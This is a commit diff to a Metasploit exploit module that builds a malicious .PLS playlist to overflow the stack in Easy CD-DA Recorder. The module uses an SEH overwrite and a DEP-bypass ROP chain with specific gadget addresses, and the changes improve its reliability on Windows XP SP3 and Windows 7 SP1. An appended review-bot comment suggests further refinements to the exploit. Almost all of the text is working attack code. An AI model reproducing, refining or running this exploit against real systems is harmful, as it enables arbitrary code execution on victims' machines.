Fix and improve reliability
parent
e8a3984c85
commit
3717374896
|
@ -9,18 +9,17 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Easy CD-DA Recorder 2007 PLS Buffer Overflow',
'Name' => 'Easy CD-DA Recorder PLS Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow vulnerability in
Easy CD-DA Recorder 2007, caused by a long string in a playlist entry.
By persuading the victim to open a specially-crafted .PLS file, a
remote attacker could execute arbitrary code on the system or cause
the application to crash.
the application to crash. This modules has been tested successfully on
Windows XP SP3 and Windows 7 SP1.
},
'License' => MSF_LICENSE,
'Author' =>
@ -43,17 +42,21 @@ class Metasploit3 < Msf::Exploit::Remote
'Platform' => 'win',
'Payload' =>
{
'BadChars' => "\x0a\x3d",
'Space' => 2559
'DisableNops' => true,
'BadChars' => "\x0a\x3d",
'Space' => 2472,
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
},
'Targets' =>
[
[ 'Windows XP SP3 (DEP Bypass)',
[ 'Windows XP SP3 / Windows 7 SP1 (DEP Bypass)',
# easycdda.exe 3.0.114.0
# audconv.dll 7.0.815.0
{
'Offset' => 1108,
'Ret' => 0x1001b19b # ADD ESP,0C10 # RETN 0x04 [audconv.dll]
}
],
]
],
'Privileged' => false,
'DisclosureDate' => 'Jun 7 2010',
@ -71,12 +74,12 @@ class Metasploit3 < Msf::Exploit::Remote
return make_nops(4).unpack("V").first
end
def exploit
def rop_nops(n = 1)
# RETN (ROP NOP) [audconv.dll]
[0x1003d55d].pack('V') * n
end
rop_nop =
[
0x1003d55d # RETN (ROP NOP) [audconv.dll]
].flatten.pack('V*')
def exploit
# ROP chain generated by mona.py - See corelan.be
rop_gadgets =
@ -100,15 +103,14 @@ class Metasploit3 < Msf::Exploit::Remote
0x00429692 # PUSHAD # INC EBX # ADD CL,CH # RETN [easycdda.exe]
].flatten.pack('V*')
sploit = rand_text_alpha_upper(target['Offset'])
sploit << generate_seh_record(target.ret)
sploit << rand_text_alpha_upper(80)
sploit << rop_nop
sploit << rand_text_alpha_upper(4)
sploit = rop_nops(target['Offset'] / 4)
sploit << [0x1003d55c].pack("V") # pop edi # ret [audconv.dll]
sploit << [target.ret].pack("V")
sploit << rop_nops(22)
sploit << rop_gadgets
sploit << make_nops(4)
sploit << payload.encoded
sploit << rand_text_alpha_upper(10000)
sploit << rand_text_alpha_upper(10000) # make it crash
# Create the file
print_status("Creating '#{datastore['FILENAME']}' file ...")
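Review bot: The nSEH gadget `0x1003d55c` hardcoded in `exploit` and the RETN address inside `rop_nops` are audconv.dll 7.0.815.0 addresses (per the target comment) yet sit outside the target entry, so per-version constants now live in two places; moving them next to `Ret` as `'Nseh' => 0x1003d55c, 'RopNop' => 0x1003d55d` and reading `target['Nseh']` / `target['RopNop']` would keep a future target self-contained. `rop_nops(target['Offset'] / 4)` also truncates silently if an Offset is ever not a multiple of 4, which would push the RETN sled out of dword alignment with the nSEH/SEH pair, so a comment such as `# Offset must be a multiple of 4 so the RETN sled stays dword-aligned with the SEH record` on that line would document the assumption. With `generate_seh_record` removed from this hunk, the `Msf::Exploit::Seh` include appears unused unless the rest of the file still relies on it. The description's `This modules has been tested` should read `This module has been tested`. The body of `exploit` continues past the end of this hunk.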